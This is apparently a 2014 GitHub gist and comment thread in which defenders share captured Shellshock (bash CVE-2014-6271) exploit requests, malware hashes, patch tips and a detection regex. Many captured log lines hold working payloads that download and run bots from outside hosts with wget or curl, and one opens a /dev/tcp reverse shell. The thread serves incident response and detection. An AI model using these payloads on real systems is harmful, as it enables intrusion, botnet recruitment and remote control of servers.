GET./.HTTP/1.0 | |
.User-Agent:.Thanks-Rob | |
.Cookie:().{.:;.};.wget.-O./tmp/besh.http://162.253.66.76/nginx;.chmod.777./tmp/besh;./tmp/besh; | |
.Host:().{.:;.};.wget.-O./tmp/besh.http://162.253.66.76/nginx;.chmod.777./tmp/besh;./tmp/besh; | |
.Referer:().{.:;.};.wget.-O./tmp/besh.http://162.253.66.76/nginx;.chmod.777./tmp/besh;./tmp/besh; | |
.Accept:.*/* | |
$ file nginx | |
nginx: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.18, stripped | |
$ md5sum nginx | |
5924bcc045bb7039f55c6ce29234e29a nginx | |
$ sha256sum nginx | |
73b0d95541c84965fa42c3e257bb349957b3be626dec9d55efcc6ebcba6fa489 nginx | |
Looking at string variables, it appears to be a kernel exploit with a CnC component. | |
- found by @yinettesys |
This comment has been minimized.
This comment has been minimized.
GelosSnake
commented
Sep 25, 2014
shit, good work |
This comment has been minimized.
This comment has been minimized.
IvRRimum
commented
Sep 25, 2014
|
This comment has been minimized.
This comment has been minimized.
ssilaev
commented
Sep 25, 2014
omg |
This comment has been minimized.
This comment has been minimized.
w-flo
commented
Sep 25, 2014
This probably connects to 89.238.150.154:5 for C&C? Which sends a "PING", and probably expects "PONG!". |
This comment has been minimized.
This comment has been minimized.
absynth
commented
Sep 25, 2014
Seems to connect to 108.162.197.26 which is a cloudflare IP. |
This comment has been minimized.
This comment has been minimized.
horacio
commented
Sep 25, 2014
Holy bejesus. |
This comment has been minimized.
This comment has been minimized.
denartha
commented
Sep 25, 2014
Curl would be better. It comes natively in nearly everything, wget does not. |
This comment has been minimized.
This comment has been minimized.
unixfreaxjp
commented
Sep 25, 2014
Analysis of the ELF dropped I wrote in VT: https://www.virustotal.com/en/file/73b0d95541c84965fa42c3e257bb349957b3be626dec9d55efcc6ebcba6fa489/analysis/1411634118/ < see comment part. I open repo of this ELF malware family as Linux/Bash0day : http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3505#p23987 |
This comment has been minimized.
This comment has been minimized.
buren-trialbee
commented
Sep 25, 2014
This comment has been minimized.
This comment has been minimized.
poggs
commented
Sep 25, 2014
Nice - the following text strings are in the binary: root |
This comment has been minimized.
This comment has been minimized.
mneimsky
commented
Sep 25, 2014
denartha you should send a note to the author. |
This comment has been minimized.
This comment has been minimized.
itiki
commented
Sep 25, 2014
OMG |
This comment has been minimized.
This comment has been minimized.
rfc1459
commented
Sep 25, 2014
If I had to make an uneducated guess, I'd say this thing is a rush job to get a botnet up&running really fast (lack of obfuscation, section headers weren't stripped, and so on) |
This comment has been minimized.
This comment has been minimized.
Jamyn
commented
Sep 25, 2014
This should be interesting. |
This comment has been minimized.
This comment has been minimized.
zhangran
commented
Sep 25, 2014
屌~~~ |
This comment has been minimized.
This comment has been minimized.
unsignedzero
commented
Sep 25, 2014
Rob a hero! |
This comment has been minimized.
This comment has been minimized.
ABISprotocol
commented
Sep 25, 2014
Thanks Yinette and Rob, et. al., This is done from your terminal. Mac / OSX: Debian / Ubuntu: sudo apt-get update && sudo apt-get upgrade Fedora / CentOS: You may want to read this thing first, maybe PREPAAAAAARRRRE |
This comment has been minimized.
This comment has been minimized.
ahollandECS
commented
Sep 25, 2014
Just saw this user-agent in the wild as well: |
This comment has been minimized.
This comment has been minimized.
muloka
commented
Sep 25, 2014
@ABISprotocol re: OSX, that won't patch the system's bash. You have to compile bash yourself, follow these instructions if you want: http://apple.stackexchange.com/questions/146849/how-do-i-recompile-bash-to-avoid-the-remote-exploit-cve-2014-6271-and-cve-2014-7/146851#146851 |
This comment has been minimized.
This comment has been minimized.
bmurch
commented
Sep 25, 2014
Looks like someone is gathering a list: grep '() { :;}' *access_log:89.207.135.125 - - [25/Sep/2014:02:52:27 -0400] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 224 "-" "() { :;}; /bin/ping -c 1 198.101.206.138" |
This comment has been minimized.
This comment has been minimized.
wilkinson
commented
Sep 25, 2014
I created a gist showing how to add a line to your bashrc to identify the presence of the vulnerability. This is useful to me because I work on many different servers with many different administrators, and I sync my bashrc across machines using Git. I would appreciate input! |
This comment has been minimized.
This comment has been minimized.
4dd3r
commented
Sep 25, 2014
This comment has been minimized.
This comment has been minimized.
rdev5
commented
Sep 25, 2014
Caught one passing in as User Agent string at 14:34. Reason: User header "HTTP_USER_AGENT" contains "() { :;}" IP Address: 93.103.21.231 |
This comment has been minimized.
This comment has been minimized.
nicheath
commented
Sep 25, 2014
209.126.230.72 - - [25/Sep/2014:00:36:54 +0000] "GET / HTTP/1.0" 200 346 "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)" Surely someone could come up with a creative script to run in place of ping. Maybe tweet the offending scanner IP address with #SHELLSHOCK hashtag. |
This comment has been minimized.
This comment has been minimized.
Colbert337
commented
Sep 26, 2014
wow,cool!THX! |
This comment has been minimized.
This comment has been minimized.
nate-kingsley
commented
Sep 26, 2014
Found another: 80.85.87.249 - - [25/Sep/2014:12:07:51 +0000] "GET /cgi-bin/hello HTTP/1.0" 404 290 "-" "() { :;}; /bin/bash -c "wget 82.220.38.36/r.txt -O /tmp/klogd"" |
This comment has been minimized.
This comment has been minimized.
chridd
commented
Sep 26, 2014
bmurch: shouldn't that be "grep '() {' *"? The colon doesn't have to be a colon for it to work. |
This comment has been minimized.
This comment has been minimized.
heyflynn
commented
Sep 26, 2014
109.202.102.224 - - [25/Sep/2014:09:44:58 -0500] "GET /cgi-bin/hello HTTP/1.0" 404 494 "-" "() { :;}; /bin/bash -c "cd /tmp;wget http://213.5.67.223/jur;curl -O http://213.5.67.223/jur ; perl /tmp/jur;rm -rf /tmp/jur"" -- this one showed up a couple times on our servers today from netherlands. the source it pulls from http://213.5.67.223/jur has what looks to be a botnet with a worm component. edit - looks like the 213.5.67.223 removed the exposed file. I have a copy of it, is there anyone in the security community I can send it to? there is some pretty scary looking shit in it. damn perl script has a built in port scanner, bot net tcp/udp flooders and spreader. |
This comment has been minimized.
This comment has been minimized.
realfx
commented
Sep 26, 2014
it work on android? |
This comment has been minimized.
This comment has been minimized.
rdev5
commented
Sep 26, 2014
Can anyone else confirm if this is a suitable intermediary fix whilst we wait for a more permanent fix? On OS X, I applied all the patches (http://ftp.gnu.org/gnu/bash/bash-4.3-patches/) and rebuilt bash 4.3 from source after making this change manually to |
This comment has been minimized.
This comment has been minimized.
ABISprotocol
commented
Sep 26, 2014
Somebody did this that supposedly works for both Mac / OSX and (all?) Linux variants, but test it yourself and have a go: https://shellshocker.net/ |
This comment has been minimized.
This comment has been minimized.
bacbos
commented
Sep 26, 2014
Same here, got different requests since yesterday morning: `[26/Sep/2014:09:10:11 +0200] "GET /cgi-bin/test.sh HTTP/1.0" 401 652 "-" "() { :;}; /bin/bash -c "wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1""`` |
This comment has been minimized.
This comment has been minimized.
UAHR
commented
Sep 26, 2014
198.101.206.138 also here: ...and this one: |
This comment has been minimized.
This comment has been minimized.
Cherrytreee
commented
Sep 26, 2014
A n00b question here: |
This comment has been minimized.
This comment has been minimized.
ChrisMCMine
commented
Sep 26, 2014
@Cherrytreee do you have cgi scripts? If not then you're safe atm. |
This comment has been minimized.
This comment has been minimized.
Cherrytreee
commented
Sep 26, 2014
@ChrisMCMine I don't. Thx! |
This comment has been minimized.
This comment has been minimized.
rdev5
commented
Sep 26, 2014
More in the wild, though it looks like one of those "Is your site affected?" website scanners like shellshocker.net (if not for the remote file fetching). In this case, I wonder if it's necessarily a good idea for people to be creating "Check your website" online testers since it provides a proxy option for people with more malicious intent.
|
This comment has been minimized.
This comment has been minimized.
ingie
commented
Sep 26, 2014
@UAHR |
This comment has been minimized.
This comment has been minimized.
Neo23x0
commented
Sep 27, 2014
I created a regex that matches the different attacks. (egrep compatible v4) ()\s{.;\s}\s*; Examples: |
This comment has been minimized.
This comment has been minimized.
ghost
commented
Sep 28, 2014
just discovered a new one in our server logs.. X.X.X.X - - [27/Sep/2014:06:18:02 +0200] "GET /de HTTP/1.0" 200 36399 "-" "() { :;}; /bin/bash -c \x22wget -q -O /dev/null http://ad.dipad.biz/test/http://customer-domain-censored.com/\x22"" |
This comment has been minimized.
This comment has been minimized.
behindthefirewalls
commented
Sep 29, 2014
"() { :;}; /bin/bash -c "wget --delete-after http://remika.ru/userfiles/file/test.php\" |
This comment has been minimized.
This comment has been minimized.
addbook
commented
Sep 29, 2014
艹 |
This comment has been minimized.
This comment has been minimized.
blues-man
commented
Sep 29, 2014
Found this: "() { :;}; /bin/bash -c '/bin/bash -i >& /dev/tcp/195.225.34.101/3333 0>&1'" |
This comment has been minimized.
This comment has been minimized.
ghost
commented
Sep 30, 2014
and another one bites the dust.. 62.210.75.170 - - [30/Sep/2014:00:13:28 +0200] "GET /de/cgi-mod/index.cgi HTTP/1.1" 404 315 "() { :; }; /bin/bash -c '/usr/bin/wget http://creditstat.ru/Y2Vuc29yZWQtZG9tYWluLmNvbVNoZWxsU2hvY2tTYWx0 >> /dev/null'" "() { :; }; /bin/bash -c '/usr/bin/wget http://creditstat.ru/Y2Vuc29yZWQtZG9tYWluLmNvbVNoZWxsU2hvY2tTYWx0 >> /dev/null'" |
This comment has been minimized.
This comment has been minimized.
Vic020
commented
Oct 1, 2014
Great, |
This comment has been minimized.
This comment has been minimized.
clontarfx
commented
Oct 2, 2014
86.34.164.238 - - [28/Sep/2014:13:01:55 +0800] "GET / HTTP/1.0" 200 364 "-" "() { :;}; /bin/bash -c "wget http://stablehost.us/bots/regular.bot -O /tmp/sh;curl -o /tmp/sh http://stablehost.us/bots/regular.bot;sh /tmp/sh;rm -rf /tmp/sh"" Seems fairly straight-forward. |
This comment has been minimized.
This comment has been minimized.
tarzand
commented
Oct 27, 2014
omg |
This comment has been minimized.
aaronkaplan commentedSep 25, 2014
oh wow... thx Rob